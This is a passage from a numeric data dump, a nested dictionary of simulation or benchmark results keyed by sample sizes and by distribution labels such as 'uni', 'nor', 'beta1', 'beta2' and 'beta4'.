1.3881493471941568, 'beta1': 1.2269055582277115, 'beta2': 2.262420348293941, 'beta4': 1.013070644375399}, 150: {'uni': 1.3045698538839274, 'nor': 1.3196920805811456, 'beta1': 1.1880572964427405, 'beta2': 2.0558617667281225, 'beta4': 1.005991272842099}, 100: {'uni': 1.2187792043393142, 'nor': 1.2533805083824479, 'beta1': 1.1698674176276556, 'beta2': 1.7781988429118438, 'beta4': 1.0477156844601478}, 75: {'uni': 1.1368638382518677, 'nor': 1.3156273710113595, 'beta1': 1.1384065945892738, 'beta2': 1.520728851249668, 'beta4': 1.0715347444966783}, 50: {'uni': 1.1195348740382625, 'nor': 1.2217075820491097, 'beta1': 1.1191859871430045, 'beta2': 1.3208187892571224, 'beta4': 1.1549001358545659}, 30: {'uni': 1.2816617391006735, 'nor': 1.2457247512395753, 'beta1': 1.1579985679748264, 'beta2': 1.3374626422140403, 'beta4': 1.1743891961050419}, 20: {'uni': 1.1321158030897833, 'nor': 1.1806020500811683, 'beta1': 1.1445242993856557, 'beta2': 1.1994374982211218, 'beta4': 1.0684569229520247}, 10: {'uni': 1.0482034958303017, 'nor': 1.0837601898005667, 'beta1': 1.0616779987167078, 
'beta2': 1.1126761632690636, 'beta4': 1.0098509988531303}}, 500: {1000: {'uni': 1.1750378415145837, 'nor': 3.146869341864523, 'beta1': 1.113523047098788, 'beta2': 7.532147143627789, 'beta4': 0.6366690553578839}, 750: {'uni': 1.073306431010815, 'nor': 2.785506492082125, 'beta1': 1.1569419751158654, 'beta2': 6.701734906168857, 'beta4': 0.6590873491367498}, 500: {'uni': 1.1865494646206205, 'nor': 2.1537630818158573, 'beta1': 1.1695402434000157, 'beta2': 4.861449944969511, 'beta4': 0.7573972651495522}, 400: {'uni': 1.2559700162444911, 'nor': 1.9444291825832516, 'beta1': 1.1664548294006372, 'beta2': 4.115283654847902, 'beta4': 0.7788833697755561}, 300: {'uni': 1.223882530974663, 'nor': 1.780734599585306, 'beta1': 1.181849766511381, 'beta2': 3.428927121287745, 'beta4': 0.8591100079004174}, 200: {'uni': 1.213711673102475, 'nor': 1.611703281792116, 'beta1': 1.111935660212546, 'beta2': 2.5258136249800422, 'beta4': 0.9379076876010537}, 150: {'uni': 1.1587728488156566, 'nor': 1.5088740961688971, 'beta1': 1.2536190947530212, 'beta2': 2.207157466230425, 'beta4': 0.9708178793619423}, 100: {'uni': 1.1068738509857443, 'nor': 1.4473315562593616, 'beta1': 1.2593071097914543, 'beta2': 1.9663232247120204, 'beta4': 1.039147765622215}, 75: {'uni': 1.2429995566003602, 'nor': 1.4276475545008478, 'beta1': 1.186401491303957, 'beta2': 1.632990789365755, 'beta4': 1.0812778097924176}, 50: {'uni': 1.237750828457372, 'nor': 1.2271226797959411, 'beta1': 1.1053381337393435, 'beta2': 1.4447132762085555, 'beta4': 1.0242240111478627}, 30: {'uni': 1.1636794654384857, 'nor': 1.2015932173450241, 'beta1': 1.1623019225244076, 'beta2': 1.320761147781629, 'beta4': 1.2103259711727377}, 20: {'uni': 1.0814390552372415, 'nor': 1.1400527764284605, 'beta1': 1.122921688334151, 'beta2': 1.2343857763528272, 'beta4': 1.1103764497171464}, 10: {'uni': 1.1215480866544199, 'nor': 1.1276367261668634, 'beta1': 1.0073667103864874, 'beta2': 1.1271701321078609, 'beta4': 1.064068238786582}}, 400: {1000: {'uni': 
1.1709956621544848, 'nor': 3.803301620228012, 'beta1': 1.13585237795199, 'beta2': 7.931053647459394, 'beta4': 0.5668008916694507}, 750: {'uni': 1.123912386780943, 'nor': 3.0924072026943685, 'beta1': 1.2516107775524297, 'beta2': 6.555198333395497, 'beta4': 0.6761278412053991}, 500: {'uni': 1.1277026591617652, 'nor': 2.393764811280239, 'beta1': 1.2223718878397243, 'beta2': 4.682526270468999, 'beta4': 0.7026539605570044}, 400: {'uni': 1.171201628605453, 'nor': 2.1206626700151974, 'beta1': 1.195020309009892, 'beta2': 3.7936143215751352, 'beta4': 0.7015564268374034}, 300: {'uni': 1.1813580277825309, 'nor': 1.8319129414820265, 'beta1': 1.1583260826331316, 'beta2': 3.378981432298624, 'beta4': 0.8533135186126821}, 200: {'uni': 1.1527570203950765, 'nor': 1.6492093642401482, 'beta1': 1.1250559844035837, 'beta2': 2.629417175894674, 'beta4': 0.8945750181944908}, 150: {'uni': 1.1966402773104476, 'nor': 1.4174278460172554, 'beta1': 1.1312768855343165, 'beta2': 2.2423319800521555, 'beta4': 0.9353503917519674}, 100: {'uni': 1.1487242305792935, 'nor': 1.400351252329324, 'beta1': 1.1848680122044735, 'beta2': 1.9072201207315755, 'beta4': 1.0083131263386365}, 75: {'uni': 1.1734385077355995, 'nor': 1.3826407546880082, 'beta1': 1.0956863506586716, 'beta2': 1.7219247447211712, 'beta4': 1.1086330606702113}, 50: {'uni': 1.1837137777194917, 'nor': 1.3151632039352283, 'beta1': 1.167898128515975, 'beta2': 1.4839051821122797, 'beta4': 1.0817886556398897}, 30: {'uni': 1.1650313696484893, 'nor': 1.2684226276255366, 'beta1': 1.122760714762532, 'beta2': 1.3189729090742208, 'beta4': 1.0940981521464919}, 20: {'uni': 1.1445136060864975, 'nor': 1.1454415023439262, 'beta1': 1.0925797846896976, 'beta2': 1.267593178190832, 'beta4': 1.0882883216948513}, 10: {'uni': 1.0560264235231998, 'nor': 1.1780906323573201, 'beta1': 1.0365397983316262, 'beta2': 1.1437958793156668, 'beta4': 1.016287458324461}}, 300: {1000: {'uni': 1.1505797365385941, 'nor': 4.331982512119483, 'beta1': 1.1139526735347547, 'beta2': 
9.469263809036718, 'beta4': 0.542849311740626}, 750: {'uni': 1.1758261434978927, 'nor': 3.7290481255519583, 'beta1': 1.1923496914716087, 'beta2': 7.813559953651863, 'beta4': 0.6059835632672069}, 500: {'uni': 1.181728515502452, 'nor': 2.8712256613239457, 'beta1': 1.1977959623656436, 'beta2': 5.3781790741274165, 'beta4': 0.6234478378948898}, 400: {'uni': 1.1420679660149184, 'nor': 2.3454510655315164, 'beta1': 1.2012772998377752, 'beta2': 4.64756804396548, 'beta4': 0.666155987456551}, 300: {'uni': 1.1132548996793066, 'nor': 2.2274013347829453, 'beta1': 1.0796836030332582, 'beta2': 3.4437770711726863, 'beta4': 0.8163520973610869}, 200: {'uni': 1.1695817222952798, 'nor': 1.7692957815475774, 'beta1': 1.1599743996759757, 'beta2': 2.784382083562161, 'beta4': 0.8364451298764334}, 150: {'uni': 1.1817571982797672, 'nor': 1.719512245624431, 'beta1': 1.1978025668978505, 'beta2': 2.3534864673445894, 'beta4': 0.8565768776251864}, 100: {'uni': 1.183952315096221, 'nor': 1.5311458905668298, 'beta1': 1.131782485730847, 'beta2': 2.065732436043435, 'beta4': 0.9070335463490746}, 75: {'uni': 1.1480746566834228, 'nor': 1.4155218896185913, 'beta1': 1.1645957200211898, 'beta2': 1.7843845120779571, 'beta4': 0.9973361357799707}, 50: {'uni': 1.1639419532835191, 'nor': 1.3626331228109334, 'beta1': 1.1576578080881406, 'beta2': 1.5222432381565012, 'beta4': 1.0709215102821763}, 30: {'uni': 1.2301310659161497, 'nor': 1.2519404957045004, 'beta1': 1.1315882862377566, 'beta2': 1.3482208892257823, 'beta4': 0.9920244358608241}, 20: {'uni': 1.154653019366009, 'nor': 1.2100560060524455, 'beta1': 1.2026849490243208, 'beta2': 1.477574606464069, 'beta4': 1.0772871940370845}, 10: {'uni': 1.08910832130117, 'nor': 1.1103645382687262, 'beta1': 1.0673808704064862, 'beta2': 1.144662691366984, 'beta4': 1.0824579533858352}}, 200: {1000: {'uni': 1.1527787642817615, 'nor': 6.454939390926548, 'beta1': 1.1761298896109023, 'beta2': 12.297910366361974, 'beta4': 0.5037081183232093}, 750: {'uni': 1.2093814994351852, 'nor': 
4.628672560837682, 'beta1': 1.1600526734627739, 'beta2': 9.183147402660344, 'beta4': 0.5551361589383061}, 500: {'uni': 1.2078272726618189, 'nor': 3.6466332747210433, 'beta1': 1.2130237412448794, 'beta2': 6.686631421443718, 'beta4': 0.5617242997884774}, 400: {'uni': 1.206977516155348, 'nor': 3.1488854332188554, 'beta1': 1.1540803837353022, 'beta2': 5.520291627506234, 'beta4': 0.6183140008339282}, 300: {'uni': 1.1905791517893638, 'nor': 2.6963294032580256, 'beta1': 1.1396662759898903, 'beta2': 4.265413520085283, 'beta4': 0.6410626330993713}, 200: {'uni': 1.1155796690656294, 'nor': 2.098305098276549, 'beta1': 1.129861528955905, 'beta2': 3.4165984530534477, 'beta4': 0.784023515637043}, 150: {'uni': 1.176017350862461, 'nor': 1.9602832396544383, 'beta1': 1.18064576730146, 'beta2': 2.771704811214909, 'beta4': 0.7694104604666213}, 100: {'uni': 1.1870479832591068, 'nor': 1.708131299253773, 'beta1': 1.1546257226851904, 'beta2': 2.286248548348897, 'beta4': 0.8911986069890743}, 75: {'uni': 1.186734186489011, 'nor': 1.5988674993523462, 'beta1': 1.0890720658424244, 'beta2': 1.884040222161873, 'beta4': 0.9033227590425998}, 50: {'uni': 1.1448055037301, 'nor': 1.3510145910314486, 'beta1': 1.158526641543175, 'beta2': 1.5553795378788289, 'beta4': 0.9721645833372996}, 30: {'uni': 1.115202194775155, 'nor': 1.2996741282115147, 'beta1': 1.151604190486726, 'beta2': 1.4787210055138473, 'beta4': 1.05355865908588}, 20: {'uni': 1.1079466886008744, 'nor': 1.3176829776291565, 'beta1': 1.1104919106516336, 'beta2': 1.2858026496544552, 'beta4': 1.0625767800782984}, 10: {'uni': 1.0683808504100314, 'nor': 1.2213539981021235, 'beta1': 1.094155600283174, 'beta2': 1.1698982620724598, 'beta4': 1.0161201783101628}}, 150: {1000: {'uni': 1.2740272992236636, 'nor': 8.04791996644241, 'beta1': 1.167362655814843, 'beta2': 14.321827882861626, 'beta4': 0.5086649989916667}, 750: {'uni': 1.163578075351652, 'nor': 6.333220872122603, 'beta1': 1.1618587854601885, 'beta2': 10.078630783844831, 'beta4': 
0.4866217170790821}, 500: {'uni': 1.1934251513310499, 'nor': 4.505679280354665, 'beta1': 1.1117564582293078, 'beta2': 7.5194623975801616, 'beta4': 0.5705530231959766}, 400: {'uni': 1.122035316119931, 'nor': 3.8691391166773323, 'beta1': 1.1694419741982156, 'beta2': 6.038197010971595, 'beta4': 0.6158188741996781}, 300: {'uni': 1.1470464121082826, 'nor': 3.274151981698333, 'beta1': 1.1506222290932826, 'beta2': 4.984385703067292, 'beta4': 0.6333396610313405}, 200: {'uni': 1.098044155143792, 'nor': 2.442058113795611, 'beta1': 1.190113631847934, 'beta2': 3.5693409544554564, 'beta4': 0.6585422486234873}, 150: {'uni': 1.1798570227406169, 'nor': 2.148902743538671, 'beta1': 1.1146678037413222, 'beta2': 3.040356329025905, 'beta4': 0.7390811919239978}, 100: {'uni': 1.1275603196569395, 'nor': 1.8634314040985047, 'beta1': 1.194982037114541, 'beta2': 2.4529169572961322, 'beta4': 0.7908591909063069}, 75: {'uni': 1.1010305363772324, 'nor': 1.7694707664540448, 'beta1': 1.1666529715718625, 'beta2': 2.240058572032016, 'beta4': 0.8738369125828138}, 50: {'uni': 1.0912147396467624, 'nor': 1.565184178967182, 'beta1': 1.168396593748277, 'beta2': 1.7986102324845101, 'beta4': 0.9613948793245802}, 30: {'uni': 1.176564975653703, 'nor': 1.3666259356184134, 'beta1': 1.18788036406429, 'beta2': 1.5016532133782363, 'beta4': 1.0139702282396725}, 20: {'uni': 1.095065206271104, 'nor': 1.245541829425765, 'beta1': 1.108511879249995, 'beta2': 1.307809873245305, 'beta4': 1.0376227789112373}, 10: {'uni': 1.1024407913868932, 'nor': 1.088965057821255, 'beta1': 1.047559539941666, 'beta2': 1.2305914089743843, 'beta4': 1.0555065357965625}}, 100: {1000: {'uni': 1.1854021246412352, 'nor': 11.016060727019472, 'beta1': 1.2051656975636194, 'beta2': 15.957467784586559, 'beta4': 0.4992260856865924}, 750: {'uni': 1.2376115548225521, 'nor': 9.068522333669398, 'beta1': 1.244046634396399, 'beta2': 12.076005102020233, 'beta4': 0.5130977526919601}, 500: {'uni': 1.1648958063745838, 'nor': 6.1072839572345, 'beta1': 
1.1268676414225556, 'beta2': 7.854398191492699, 'beta4': 0.49958427017588514}, 400: {'uni': 1.1512278350516503, 'nor': 5.392715793997558, 'beta1': 1.1696021387623763, 'beta2': 7.332529107921338, 'beta4': 0.5328982120077344}, 300: {'uni': 1.1043591222583407, 'nor': 4.4365428928964254, 'beta1': 1.1132005110374124, 'beta2': 5.628002146631942, 'beta4': 0.5536099970772167}, 200: {'uni': 1.1946682563618547, 'nor': 3.3521570330308985, 'beta1': 1.2773341961233582, 'beta2': 4.004404893156947, 'beta4': 0.5837234579894335}, 150: {'uni': 1.1871501213686806, 'nor': 2.6193172667330704, 'beta1': 1.2297350806502172, 'beta2': 3.2042632533037256, 'beta4': 0.664274700436926}, 100: {'uni': 1.1497621584178024, 'nor': 2.1108766254691096, 'beta1': 1.1782324016667887, 'beta2': 2.5577399519012474, 'beta4': 0.746926383653656}, 75: {'uni': 1.1351408307441955, 'nor': 1.9522867474160084, 'beta1': 1.17767812715346, 'beta2': 2.1504826050745596, 'beta4': 0.7800890585405549}, 50: {'uni': 1.1263071014294783, 'nor': 1.8648089116567583, 'beta1': 1.1165179662639755, 'beta2': 1.9238108413225985, 'beta4': 0.9041009123841088}, 30: {'uni': 1.0926805561594322, 'nor': 1.4407528275952637, 'beta1': 1.188495602696405, 'beta2': 1.4665059544892458, 'beta4': 0.9539791513025705}, 20: {'uni': 1.121846468062343, 'nor': 1.328793041952113, 'beta1': 1.1664944334710992, 'beta2': 1.4522639614141404, 'beta4': 0.9956736124755978}, 10: {'uni': 1.1204549491237221, 'nor': 1.2323011448950902, 'beta1': 1.0928258842828849, 'beta2': 1.1531922357852749, 'beta4': 1.0153739202425465}}, 75: {1000: {'uni': 1.332821520339607, 'nor': 15.930089443152745, 'beta1': 1.171289101639284, 'beta2': 18.174364842184723, 'beta4': 0.47321284305584627}, 750: {'uni': 1.237290264475581, 'nor': 11.490043022545008, 'beta1': 1.189059377730262, 'beta2': 14.62336228067083, 'beta4': 0.5246962209488442}, 500: {'uni': 1.1921816708526098, 'nor': 8.46428457112535, 'beta1': 1.1404773815220697, 'beta2': 9.354886012350446, 'beta4': 0.5042313193695894}, 400: {'uni': 
1.172495477607942, 'nor': 7.06519806952231, 'beta1': 1.1409970424303444, 'beta2': 8.453757070459439, 'beta4': 0.5275066908015517}, 300: {'uni': 1.2465428749029002, 'nor': 5.077552364373244, 'beta1': 1.2207943511424872, 'beta2': 5.989394174052176, 'beta4': 0.5145819316096251}, 200: {'uni': 1.21364225652058, 'nor': 3.793546862065341, 'beta1': 1.143576109267149, 'beta2': 4.450035842097597, 'beta4': 0.5722235640628546}, 150: {'uni': 1.1973537999124575, 'nor': 3.209445041412377, 'beta1': 1.1671496584378878, 'beta2': 3.6863319201894784, 'beta4': 0.6184152779108703}, 100: {'uni': 1.0730621748849436, 'nor': 2.515170518881428, 'beta1': 1.124202789251099, 'beta2': 2.853910469618436, 'beta4': 0.7079223488677664}, 75: {'uni': 1.1908002668890179, 'nor': 2.164307715576605, 'beta1': 1.1022232454630696, 'beta2': 2.6088159557751553, 'beta4': 0.7334138456473607}, 50: {'uni': 1.1327461894839026, 'nor': 1.7201198114580145, 'beta1': 1.1319588983511386, 'beta2': 1.875704530171311, 'beta4': 0.8228333594398864}, 30: {'uni': 1.1604850914644518, 'nor': 1.507022954768851, 'beta1': 1.1184205952563668, 'beta2': 1.7049042795022542, 'beta4': 0.9090222616137686}, 20: {'uni': 1.0762655242253933, 'nor': 1.4024810972045139, 'beta1': 1.03796705073592, 'beta2': 1.4861849386146158, 'beta4': 0.9723829285399783}, 10: {'uni': 1.0557491101661625, 'nor': 1.1837049281841963, 'beta1': 1.166904154786038, 'beta2': 1.2828863202120704, 'beta4': 0.988651200103153}}, 50: {1000: {'uni': 1.4413407568858028, 'nor': 22.566743280217178, 'beta1': 1.2276482007225256, 'beta2': 23.056210692408463, 'beta4': 0.4660189481672189}, 750: {'uni': 1.2718280400240256, 'nor': 16.30493656353458, 'beta1': 1.1326711971589989, 'beta2': 17.81662862884342, 'beta4': 0.4728350561687182}, 500: {'uni': 1.172235040453299, 'nor': 11.8095459061109, 'beta1': 1.181820315426212, 'beta2': 11.662524110362135, 'beta4': 0.48534660865668927}, 400: {'uni': 1.2867021297441419, 'nor': 9.511213374630067, 'beta1': 1.2268838616908635, 'beta2': 
9.279921733726201, 'beta4': 0.4945713984775927}, 300: {'uni': 1.1906774155008837, 'nor': 7.799766973090263, 'beta1': 1.1087965280456227, 'beta2': 7.004329940698066, 'beta4': 0.4948098176026741}, 200: {'uni': 1.206765832059108, 'nor': 5.495221421844641, 'beta1': 1.1424530528570438, 'beta2': 5.236791374243084, 'beta4': 0.5249512538272287}, 150: {'uni': 1.1170041207411467, 'nor': 4.3935496972015, 'beta1': 1.1360421454285754, 'beta2': 4.307820473968464, 'beta4': 0.5295783353350124}, 100: {'uni': 1.1694439140708475, 'nor': 3.225800948995303, 'beta1': 1.1621945829082418, 'beta2': 3.0646789563538985, 'beta4': 0.6485731805209067}, 75: {'uni': 1.1306779142265537, 'nor': 2.662959575031019, 'beta1': 1.1778740846961646, 'beta2': 2.4852673590966248, 'beta4': 0.7258091242476691}, 50: {'uni': 1.1941609396429214, 'nor': 2.268899895733848, 'beta1': 1.1179901890554762, 'beta2': 1.9249867348265446, 'beta4': 0.7226933151870409}, 30: {'uni': 1.1178041704281778, 'nor': 1.7330770857627482, 'beta1': 1.1113467743710106, 'beta2': 1.8092372960659309, 'beta4': 0.8367650025431632}, 20: {'uni': 1.083908466243809, 'nor': 1.7186907573668564, 'beta1': 1.083302381748618, 'beta2': 1.5393750399929973, 'beta4': 0.8843295960246518}, 10: {'uni': 1.0487945600677406, 'nor': 1.2709613436276843, 'beta1': 1.0965000588955878, 'beta2': 1.2197123454385659, 'beta4': 0.9498288164294515}}, 30: {1000: {'uni': 1.8025024634308071, 'nor': 34.25391130897347, 'beta1': 1.1885614558788913, 'beta2': 29.85311114615026, 'beta4': 0.44359490195802476}, 750: {'uni': 1.5718950453388483, 'nor': 25.931606992440997, 'beta1': 1.233787933808761, 'beta2': 22.222336937321206, 'beta4': 0.47171304922279156}, 500: {'uni': 1.403990081760866, 'nor': 19.873193730295956, 'beta1': 1.2365306225266401, 'beta2': 14.658302774468805, 'beta4': 0.47265105875053215}, 400: {'uni': 1.4005854960541118, 'nor': 14.275653195236494, 'beta1': 1.214820107700645, 'beta2': 11.752460418098707, 'beta4': 0.4649244188284235}, 300: {'uni': 1.3560572497527095, 'nor': 
12.509697042432672, 'beta1': 1.1642210787364398, 'beta2': 8.687500402569903, 'beta4': 0.48001789365740266}, 200: {'uni': 1.3078770132829531, 'nor': 8.242370389013965, 'beta1': 1.1516547957019738, 'beta2': 6.242815309406197, 'beta4': 0.4898507763421597}, 150: {'uni': 1.2387509836120234, 'nor': 6.212710987107977, 'beta1': 1.0759699330173904, 'beta2': 4.88761333337693, 'beta4': 0.510446983736842}, 100: {'uni': 1.231601768722487, 'nor': 4.5761367907404225, 'beta1': 1.1487740706520697, 'beta2': 3.5175168730166617, 'beta4': 0.5486902188853022}, 75: {'uni': 1.0693543659957778, 'nor': 3.951109643287017, 'beta1': 1.159979011102066, 'beta2': 3.144205840473643, 'beta4': 0.6245822913647954}, 50: {'uni': 1.142865316506463, 'nor': 2.969464463659539, 'beta1': 1.1592908541069569, 'beta2': 2.3836666468730012, 'beta4': 0.6332045220521555}, 30: {'uni': 1.0780858467029557, 'nor': 2.2574174573745505, 'beta1': 1.1744480844394878, 'beta2': 1.8478740024591505, 'beta4': 0.7343335412858117}, 20: {'uni': 1.0661001511027859, 'nor': 1.8097097184403295, 'beta1': 1.1520955489343616, 'beta2': 1.589815348006933, 'beta4': 0.799204183667358}, 10: {'uni': 1.1068513962930462, 'nor': 1.4174803659728914, 'beta1': 1.0195412075619765, 'beta2': 1.2736913537907808, 'beta4': 0.9086670084626601}}, 20: {1000: {'uni': 2.1816898666989353, 'nor': 54.589719460785915, 'beta1': 1.2780684016305557, 'beta2': 34.326668467189265, 'beta4': 0.42822336518380305}, 750: {'uni': 2.008633513369925, 'nor': 44.01386503835255, 'beta1': 1.1910602410914366, 'beta2': 25.92566104708618, 'beta4': 0.4563357309045434}, 500: {'uni': 1.7305415449208486, 'nor': 27.626080265992513, 'beta1': 1.2716481133711786, 'beta2': 17.339855281822697, 'beta4': 0.45580442590011244}, 400: {'uni': 1.6535339448650972, 'nor': 22.71498971521692, 'beta1': 1.2541165554611715, 'beta2': 14.250093795750274, 'beta4': 0.4549406486288468}, 300: {'uni': 1.5052840944772048, 'nor': 17.85214260880071, 'beta1': 1.1639571625183778, 'beta2': 11.414421423641553, 'beta4': 
0.4659886102645737}, 200: {'uni': 1.3497443785045566, 'nor': 12.360091713030048, 'beta1': 1.1717637987871659, 'beta2': 7.455419425198178, 'beta4': 0.47174970505848157}, 150: {'uni': 1.3331996994902409, 'nor': 9.288283829992508, 'beta1': 1.2506008956247794, 'beta2': 6.08397354138583, 'beta4': 0.4686509521384706}, 100: {'uni': 1.2687928512207793, 'nor': 6.558077105937877, 'beta1': 1.1613621405497763, 'beta2': 4.103340600228283, 'beta4': 0.48725121395441656}, 75: {'uni': 1.2299552447081301, 'nor': 5.171143302936504, 'beta1': 1.1199869147433412, 'beta2': 3.3288792386276485, 'beta4': 0.5273865297234503}, 50: {'uni': 1.090863672616496, 'nor': 3.700143871425098, 'beta1': 1.0922976037420196, 'beta2': 2.6115744897059754, 'beta4': 0.594876803029818}, 30: {'uni': 1.0853328914480391, 'nor': 2.646623445458865, 'beta1': 1.0736193852418847, 'beta2': 1.96046643608669, 'beta4': 0.6252246663540566}, 20: {'uni': 1.1496312474830275, 'nor': 2.003838638976139, 'beta1': 1.2149235284576705, 'beta2': 1.6737605753508866, 'beta4': 0.7318124922604088}, 10: {'uni': 1.0302973694434716, 'nor': 1.6481938151667288, 'beta1': 1.0090308312145542, 'beta2': 1.4427058937732395, 'beta4': 0.8372887168016149}}, 10: {1000: {'uni': 4.47761779649345, 'nor': 106.97243626351514, 'beta1': 1.7718712572599664, 'beta2': 50.89972781133419, 'beta4': 0.45035039981991665}, 750: {'uni': 3.524513869962408, 'nor': 77.33864323159318, 'beta1': 1.6594491239956215, 'beta2': 36.25193105958197, 'beta4': 0.45647026837978366}, 500: {'uni': 2.933652803232629, 'nor': 56.19541613997431, 'beta1': 1.412868106014215, 'beta2': 24.493194030260376, 'beta4': 0.45626898980087244}, 400: {'uni': 2.5868581455589927, 'nor': 41.97644401918418, 'beta1': 1.3845576358953788, 'beta2': 20.500958607909546, 'beta4': 0.4503472771888699}, 300: {'uni': 2.1638043642684397, 'nor': 31.371026430711506, 'beta1': 1.3272523442702153, 'beta2': 15.391703293162744, 'beta4': 0.426134575227121}, 200: {'uni': 1.8664012577325673, 'nor': 23.02116576643852, 'beta1': 
1.1669422527582627, 'beta2': 9.917500823904055, 'beta4': 0.4686925986716054}, 150: {'uni': 1.7272031794635727, 'nor': 15.992174734196075, 'beta1': 1.1700097974836747, 'beta2': 7.593771525578843, 'beta4': 0.45209920535131604}, 100: {'uni': 1.5210995197369952, 'nor': 11.60348589966613, 'beta1': 1.2199502179320187, 'beta2': 5.80028326920741, 'beta4': 0.45568014305226345}, 75: {'uni': 1.3099777177647, 'nor': 9.081005946150388, 'beta1': 1.0858315960507317, 'beta2': 4.53706520639466, 'beta4': 0.4977455754301163}, 50: {'uni': 1.3698349812635664, 'nor': 6.4873540534480245, 'beta1': 1.1411439665960967, 'beta2': 3.223332209368324, 'beta4': 0.4833115916272488}, 30: {'uni': 1.113033156501957, 'nor': 4.298523360691007, 'beta1': 1.1621220740176146, 'beta2': 2.235410496252283, 'beta4': 0.515573259834472}, 20: {'uni': 1.15231886075087, 'nor': 3.1542586458579533, 'beta1': 1.0959485235296258, 'beta2': 1.8690482386517902, 'beta4': 0.6022690986627974}, 10: {'uni': 1.0545459710410021, 'nor': 2.1410930258529346, 'beta1': 1.0432471611208785, 'beta2': 1.366107687212368, 'beta4': 0.7483649469211368}}}, 0.005: {1000: {1000: {'uni': 0.8492986502558074, 'nor': 1.6502490676284018, 'beta1': 0.8928233637722481, 'beta2': 5.0465080846258035, 'beta4': 0.554324759981653}, 750: {'uni': 0.876649520000162, 'nor': 1.4627775450104223, 'beta1': 0.8927432912877891, 'beta2': 4.0831718791391065, 'beta4': 0.5839305121400691}, 500: {'uni': 0.8314273255127868, 'nor': 1.2427601107117765, 'beta1': 0.8616522044180317, 'beta2': 2.907878706545564, 'beta4': 0.6644891840401165}, 400: {'uni': 0.8711765218939584, 'nor': 1.1725637742176804, 'beta1': 0.8945007645711051, 'beta2': 2.513524008354758, 'beta4': 0.7063402078076012}, 300: {'uni': 0.866990878802388, 'nor': 1.0601280123390195, 'beta1': 0.871577011386766, 'beta2': 1.990868873830486, 'beta4': 0.732977364574049}, 200: {'uni': 0.8484587729105408, 'nor': 1.0344752399437118, 'beta1': 0.8685203061001582, 'beta2': 1.6180514467121998, 'beta4': 0.7806210956771433}, 150: 
{'uni': 0.863325702964267, 'nor': 1.0163561854641152, 'beta1': 0.8609990835029007, 'beta2': 1.4501812273816659, 'beta4': 0.7933909895157425}, 100: {'uni': 0.8535173498455411, 'nor': 0.9332321122550727, 'beta1': 0.855451185502481, 'beta2': 1.2836429881798883, 'beta4': 0.8283385948050672}, 75: {'uni': 0.8719646248874783, 'nor': 0.9339021717557474, 'beta1': 0.8834615749377533, 'beta2': 1.157371893819168, 'beta4': 0.8151331566491923}, 50: {'uni': 0.8588721072497052, 'nor': 0.9324710043913952, 'beta1': 0.8592057109555745, 'beta2': 1.005974174058964, 'beta4': 0.8441503729380052}, 30: {'uni': 0.8268972332475851, 'nor': 0.8939432944293645, 'beta1': 0.8637300328894056, 'beta2': 0.9696041216651038, 'beta4': 0.8349904563989077}, 20: {'uni': 0.8575101264137438, 'nor': 0.8505944620056278, 'beta1': 0.8252029433248387, 'beta2': 0.9138477219306325, 'beta4': 0.859578392201494}, 10: {'uni': 0.8358303873495666, 'nor': 0.8475060468582208, 'beta1': 0.8198935626927145, 'beta2': 0.8863798415821968, 'beta4': 0.8028217733408507}}, 750: {1000: {'uni': 0.8893529119601304, 'nor': 1.8735326010619875, 'beta1': 0.8535189782879702, 'beta2': 5.094330840454726, 'beta4': 0.5252869847576926}, 750: {'uni': 0.8662548201881118, 'nor': 1.5939108097202517, 'beta1': 0.8620863564259129, 'beta2': 3.9224913698305763, 'beta4': 0.5565068303406758}, 500: {'uni': 0.8687024244817314, 'nor': 1.3429858216869892, 'beta1': 0.8659273649776043, 'beta2': 2.8714917333330945, 'beta4': 0.6115318046265227}, 400: {'uni': 0.8477929303428912, 'nor': 1.303342679028703, 'beta1': 0.8809644810541455, 'beta2': 2.525131323735293, 'beta4': 0.6209718469957444}, 300: {'uni': 0.8455781800923797, 'nor': 1.1790701643940078, 'beta1': 0.8989754737431781, 'beta2': 2.0532709282654986, 'beta4': 0.7031938135827249}, 200: {'uni': 0.8523231827202161, 'nor': 1.0542529777285443, 'beta1': 0.8485149018797521, 'beta2': 1.6805292794311386, 'beta4': 0.7350427322547652}, 150: {'uni': 0.8396399434545224, 'nor': 1.0383213011327654, 'beta1': 
0.8440622218870381, 'beta2': 1.4760254972629505, 'beta4': 0.7523241499310742}, 100: {'uni': 0.8566810026475448, 'nor': 1.0171647257308214, 'beta1': 0.8613367134797993, 'beta2': 1.3133239582389826, 'beta4': 0.7943525941981162}, 75: {'uni': 0.8660172203154917, 'nor': 0.9591045119200551, 'beta1': 0.8369295019442069, 'beta2': 1.1456508181998266, 'beta4': 0.8038265430699089}, 50: {'uni': 0.8916502682562102, 'nor': 0.9134648222438218, 'beta1': 0.8650674166134595, 'beta2': 1.049261212642131, 'beta4': 0.8429049932670651}, 30: {'uni': 0.8473840494179985, 'nor': 0.8593935913424329, 'beta1': 0.8549015071344843, 'beta2': 0.9488767154018491, 'beta4': 0.8370179764634424}, 20: {'uni': 0.8404817022893748, 'nor': 0.877865137025845, 'beta1': 0.8739655207876006, 'beta2': 0.928251728118239, 'beta4': 0.8381578990306405}, 10: {'uni': 0.848709588465607, 'nor': 0.8389582119738962, 'beta1': 0.8048592485731447, 'beta2': 0.8735632432997815, 'beta4': 0.8077397160130388}}, 500: {1000: {'uni': 0.8869990124500643, 'nor': 2.3926471716005158, 'beta1': 0.8656755725118289, 'beta2': 6.218693125937045, 'beta4': 0.47295872282949647}, 750: {'uni': 0.8711004704227291, 'nor': 1.9852109566671436, 'beta1': 0.8695174006440114, 'beta2': 4.849215935260051, 'beta4': 0.5053262520867102}, 500: {'uni': 0.8798487334123686, 'nor': 1.6132673631091394, 'beta1': 0.8630878624950258, 'beta2': 3.5751240393739327, 'beta4': 0.5511306421251556}, 400: {'uni': 0.903491887056683, 'nor': 1.4973046687736005, 'beta1': 0.8929322973576271, 'beta2': 3.0325455273622204, 'beta4': 0.6067709882656296}, 300: {'uni': 0.8670349102220135, 'nor': 1.290326276042757, 'beta1': 0.839686493831913, 'beta2': 2.435890895296174, 'beta4': 0.6075123141293552}, 200: {'uni': 0.8525634185824962, 'nor': 1.2167168133729125, 'beta1': 0.8751305172873307, 'beta2': 1.8939241535011913, 'beta4': 0.6858269415712721}, 150: {'uni': 0.82194800780123, 'nor': 1.0736570375346075, 'beta1': 0.8744521367451882, 'beta2': 1.666617032750535, 'beta4': 0.7183015194836465}, 100: 
